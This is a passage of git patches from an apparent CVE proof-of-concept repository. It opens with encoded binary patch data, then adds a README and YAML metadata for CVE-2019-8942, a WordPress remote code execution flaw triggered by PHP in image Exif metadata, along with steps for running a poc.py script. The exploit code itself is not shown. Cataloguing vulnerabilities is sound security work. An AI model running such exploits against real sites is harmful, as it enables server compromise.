zbKcdti@{PedzwVnb$B1y*EhZ5zIY{rs=JiC-lRbn3Ez|ZfqE9Po&4xc#)hU>D|HjR z)|Ip7ge-iACHPnlnP7AhH+J;?KafE`@E}~W?41Prr3&mPc;>yaUtkzSXnOFtpllU& zcTGQn)gTzZf~5MUKo|+M2D<1XX%81rLIxXHF=T^e)q2I8n}2Z3i1O&m*oYu|r$K@+ zc&#c#ooxo&ga@Z5Kl*5QQJ~t+j6itAa#nh#_VA88_Mu$b>U$M(lOpT=9*+yOhAwv$ z-D(lk;;ws~`cY((j;}-h4Omqqgkt)|>PO!k4bpd%{*Pd^e_aay|MUNT4> Date: Fri, 7 Apr 2023 12:38:10 +0000 Subject: [PATCH 13/19] add cve/WordPress/2019/CVE-2019-8942/README.md. Signed-off-by: bbj --- cve/WordPress/2019/CVE-2019-8942/README.md | 29 ++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cve/WordPress/2019/CVE-2019-8942/README.md diff --git a/cve/WordPress/2019/CVE-2019-8942/README.md b/cve/WordPress/2019/CVE-2019-8942/README.md new file mode 100644 index 00000000..c248bbac --- /dev/null +++ b/cve/WordPress/2019/CVE-2019-8942/README.md @@ -0,0 +1,29 @@ +# CVE-2019-8942 Proof-of-Concept + +### Overview + +WordPress before 4.9.9 and 5.x before 5.0.1 allows remote code execution because an _wp_attached_file Post Meta entry can be changed to an arbitrary string, such as one ending with a .jpg?file.php substring. An attacker with author privileges can execute arbitrary code by uploading a crafted image containing PHP code in the Exif metadata. Exploitation can leverage CVE-2019-8943. +For a comprehensive understanding, check out the accompanying [blog post](http://blog.nsfocus.net/wordpress-5-0-0-rce/) for in-depth details. + +### Dependencies + +* python3 +* requests package + +### Usage + +1. Verify requests is installed: +``` +sudo pip3 install requests +``` + +2. Modify the url_root in poc.py as you wish: +for example: +``` +url_root = 'http://localhost/' +``` + +3. Run the PoC: +``` +python3 ./poc.py +``` \ No newline at end of file -- Gitee From e4fa192188e7553c092bc799bc44ebab14d1f93b Mon Sep 17 00:00:00 2001 From: bbj Date: Fri, 7 Apr 2023 12:38:40 +0000 Subject: [PATCH 14/19] update cve/WordPress/2019/CVE-2019-8942/README.md. Signed-off-by: bbj --- cve/WordPress/2019/CVE-2019-8942/README.md | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/cve/WordPress/2019/CVE-2019-8942/README.md b/cve/WordPress/2019/CVE-2019-8942/README.md index c248bbac..00668b78 100644 --- a/cve/WordPress/2019/CVE-2019-8942/README.md +++ b/cve/WordPress/2019/CVE-2019-8942/README.md @@ -17,8 +17,7 @@ For a comprehensive understanding, check out the accompanying [blog post](http:/ sudo pip3 install requests ``` -2. Modify the url_root in poc.py as you wish: -for example: +2. Modify the url_root in poc.py as you wish, for example:: ``` url_root = 'http://localhost/' ``` -- Gitee From da52a13dbe772671593ea91bf98fe4b0df6ae37e Mon Sep 17 00:00:00 2001 From: bbj Date: Fri, 7 Apr 2023 12:40:07 +0000 Subject: [PATCH 15/19] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/WordPress/2019/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/WordPress/2019/yaml/.keep diff --git a/cve/WordPress/2019/yaml/.keep b/cve/WordPress/2019/yaml/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From b820feefb431d63d89d7441a4acc18cab8708b7c Mon Sep 17 00:00:00 2001 From: bbj Date: Fri, 7 Apr 2023 12:56:07 +0000 Subject: [PATCH 16/19] rename cve/WordPress/2019/yaml/.keep to cve/WordPress/2019/yaml/CVE-2019-8942.yaml. Signed-off-by: bbj --- cve/WordPress/2019/yaml/.keep | 0 cve/WordPress/2019/yaml/CVE-2019-8942.yaml | 21 +++++++++++++++++++++ 2 files changed, 21 insertions(+) delete mode 100644 cve/WordPress/2019/yaml/.keep create mode 100644 cve/WordPress/2019/yaml/CVE-2019-8942.yaml diff --git a/cve/WordPress/2019/yaml/.keep b/cve/WordPress/2019/yaml/.keep deleted file mode 100644 index e69de29b..00000000 diff --git a/cve/WordPress/2019/yaml/CVE-2019-8942.yaml b/cve/WordPress/2019/yaml/CVE-2019-8942.yaml new file mode 100644 index 00000000..b2d43e43 --- /dev/null +++ b/cve/WordPress/2019/yaml/CVE-2019-8942.yaml @@ -0,0 +1,21 @@ +id: CVE-2019-8942 +source: + https://github.com/synacktiv/CVE-2019-8942 +info: + name: WordPress是一款免费开源的内容管理系统(CMS),目前已经成为全球使用最多的CMS建站程序。 + severity: high + description: | + WordPress before 4.9.9 and 5.x before 5.0.1 allows remote code execution because an _wp_attached_file Post Meta entry can be changed to an arbitrary string, such as one ending with a .jpg?file.php substring. An attacker with author privileges can execute arbitrary code by uploading a crafted image containing PHP code in the Exif metadata. Exploitation can leverage CVE-2019-8943. + scope-of-influence: + WordPress < 4.9.9 + WordPress 5.x < 5.0.1 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2019-8942 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2019-8942 + cwe-id: CWE-434 + cnvd-id: None + kve-id: None + tags: RCE,远程代码执行 \ No newline at end of file -- Gitee From 1987af222e5aabd2315c8682e8ac390a2a39d6ac Mon Sep 17 00:00:00 2001 From: bbj Date: Fri, 7 Apr 2023 12:56:28 +0000 Subject: [PATCH 17/19] update cve/WordPress/2019/yaml/CVE-2019-8942.yaml. Signed-off-by: bbj --- cve/WordPress/2019/yaml/CVE-2019-8942.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cve/WordPress/2019/yaml/CVE-2019-8942.yaml b/cve/WordPress/2019/yaml/CVE-2019-8942.yaml index b2d43e43..4223ef65 100644 --- a/cve/WordPress/2019/yaml/CVE-2019-8942.yaml +++ b/cve/WordPress/2019/yaml/CVE-2019-8942.yaml @@ -18,4 +18,4 @@ info: cwe-id: CWE-434 cnvd-id: None kve-id: None - tags: RCE,远程代码执行 \ No newline at end of file + tags: RCE, 远程代码执行 \ No newline at end of file -- Gitee From 1d71a4c3eab15197133ef5f1b48819375d24988c Mon Sep 17 00:00:00 2001 From: bbj Date: Fri, 7 Apr 2023 12:58:19 +0000 Subject: [PATCH 18/19] update other_list.yaml. Signed-off-by: bbj --- other_list.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/other_list.yaml b/other_list.yaml index fc7663c8..a1c0e3e2 100644 --- a/other_list.yaml +++ b/other_list.yaml @@ -45,4 +45,6 @@ cve: - CVE-2022-23131 Zyxel: - CVE-2022-30525 + WordPress: + - CVE-2019-8942 cnvd: -- Gitee From 26a0fc5737149c32110929181e11882356cb84e4 Mon Sep 17 00:00:00 2001 From: bbj Date: Fri, 7 Apr 2023 13:03:08 +0000 Subject: [PATCH 19/19] update cve/WordPress/2019/CVE-2019-8942/README.md. Signed-off-by: bbj --- cve/WordPress/2019/CVE-2019-8942/README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cve/WordPress/2019/CVE-2019-8942/README.md b/cve/WordPress/2019/CVE-2019-8942/README.md index 00668b78..812c6782 100644 --- a/cve/WordPress/2019/CVE-2019-8942/README.md +++ b/cve/WordPress/2019/CVE-2019-8942/README.md @@ -12,12 +12,12 @@ For a comprehensive understanding, check out the accompanying [blog post](http:/ ### Usage -1. Verify requests is installed: +1. Verify if requests is installed: ``` sudo pip3 install requests ``` -2. Modify the url_root in poc.py as you wish, for example:: +2. Modify the "url_root" in poc.py as you wish, for example: ``` url_root = 'http://localhost/' ``` -- Gitee